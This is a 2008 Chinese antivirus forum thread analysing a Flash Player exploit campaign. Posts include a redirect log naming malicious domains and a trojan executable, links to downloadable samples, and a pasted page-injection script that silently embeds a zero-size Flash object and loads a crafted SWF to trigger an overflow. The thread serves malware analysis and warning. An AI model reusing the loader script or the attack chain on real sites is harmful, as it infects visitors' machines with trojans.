查看: 3603|回复: 13
收起左侧

[已鉴定] 最新Flash网马泛滥

 关闭 [复制链接]
秋叶濛濛
发表于 2008-5-27 16:54:53 | 显示全部楼层 |阅读模式
来源:卡卡救援区

Log is generated by FreShow.
[wide]http://%73%61%79%38%2E%75%73/s.js
    [frame]http://d.sorryl.biz/xx/am7.htm?888
        [frame]http://d.sorryl.biz/ax14.htm
            [object]http://www.tongji123.org/soc.exe
        [frame]http://d.sorryl.biz/re10.htm
            [object]http://www.tongji123.org/soc.exe
        [frame]http://www.tongji123.org/axfs.htm

1.jpg
(对比查看信息地址http://www.scanw.com/blog/archives/208
            
            [object]http://www.tongji123.org/1231.swf
                [object]http://www.tongji123.org/i1231.swf
        [frame]http://d.sorryl.biz/axlz.htm
            [object]http://www.tongji123.org/soc.exe
        [frame]http://d.sorryl.biz/re11.htm
            [object]http://www.tongji123.org/soc.exe

1231.swf是正常文件 其中调用恶意构造的i1231.swf,会导致溢出,从而执行任意指令。

1231.swf文件内容调用i1231.swf
3.jpg
i1231.swf文件内容导致溢出
2.jpg


附带样本和恶意swf文件
桌面.rar (23.48 KB, 下载次数: 98)
sanhu35
发表于 2008-5-27 16:59:58 | 显示全部楼层
只会对124以前的版有效
124版早就放出了
palfan
发表于 2008-5-27 17:02:40 | 显示全部楼层
http://www.tongji123.org/

这个域名好像看见过很多次了

PS.swf用什么分析的?
秋叶濛濛
 楼主| 发表于 2008-5-27 17:02:51 | 显示全部楼层
Flash插件是必须的 关键谁没事做更新Flash插件-。-
这么貌似危害要比06024或者迅雷之类大得多
秋叶濛濛
 楼主| 发表于 2008-5-27 17:04:18 | 显示全部楼层
原帖由 palfan 于 2008-5-27 17:02 发表
http://www.tongji123.org/

这个域名好像看见过很多次了

PS.swf用什么分析的?


十六进制编辑器
Exia 该用户已被删除
发表于 2008-5-27 17:13:30 | 显示全部楼层
25029001  1231.swf  97 Byte  CLEAN
25029364  soc.exe  21.81 KB  MALWARE
25029003  i1231.swf  1.5 KB  CLEAN

The file 'soc.exe' has been determined to be 'MALWARE'.
Our analysts named the threat TR/Drop.Agent.jum. The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection will be added to our virus definition file (VDF) with one of the next updates. Please note that Avira's proactive heuristic detection module AHeAD detected this threat up front without the latest VDF update as: HEUR/Malware.
tanlimo
发表于 2008-5-27 17:14:26 | 显示全部楼层
可惜,已经打补丁了,无法体会这个漏洞的强大之处了。

这两swf用记事本就能分析了。
palfan
发表于 2008-5-27 17:14:32 | 显示全部楼层

回复 4楼 秋叶濛濛 的帖子

也许再过不久就会出现sliverlight病毒了呢
电影结束了
发表于 2008-5-27 17:48:38 | 显示全部楼层
Snap3.png
ranguangning
头像被屏蔽
发表于 2008-5-27 18:06:55 | 显示全部楼层
【【【【转过来】】】】

最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马,该网马通过网页加载一个正常的FLASH文件,再在那个FLASH文件里调用嵌入恶意构造的FLASH文件,这时会导致溢出,从而可能执行任意指令。以下为调用页内容:
<script>
window.onerror=function(){return true;}
function init(){window.status=”";}window.onload = init;
if(document.cookie.indexOf(”play=”)==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”play=Yes;path=/;expires=”+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf(”msie”)>0)
{
document.write(’<object classid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″ codebase=”http://download.macromedia.com/p ... flash.cab#version=4,0,19,0″ width=”0″ height=”0″ align=”middle”>’);
document.write(’<param name=”allowScriptAccess” value=”sameDomain”/>’);
document.write(’<param name=”movie” value=”http://www.XXX.cn/flash/XX.swf”/>’);
document.write(’<param name=”quality” value=”high”/>’);
document.write(’<param name=”bgcolor” value=”#ffffff”/>’);
document.write(’<embed src=”http://www.XXX.cn/flash/XX.swf” mce_src=”http://www.XXX.cn/flash/XX.swf”/>’);
document.write(’</object>’);
}else
{document.write(”<EMBED src=http://www.XXX.cn/flash/XX.swf width=0 height=0>”);}}
</script>                                                                              


以下为正常的FLASH文件使用的脚本:


// Action script…// [Action in Frame 1]
var flashVersion =/hxversion;
loadMovie(”http://www.XXX.cn/flash/” + flashVersion + “mal_swf.swf”, _root);
stop();

该恶意FLASH部分内容如下:
1.jpg


[ 本帖最后由 ranguangning 于 2008-5-27 18:12 编辑 ]
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-15 07:49 , Processed in 0.176309 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表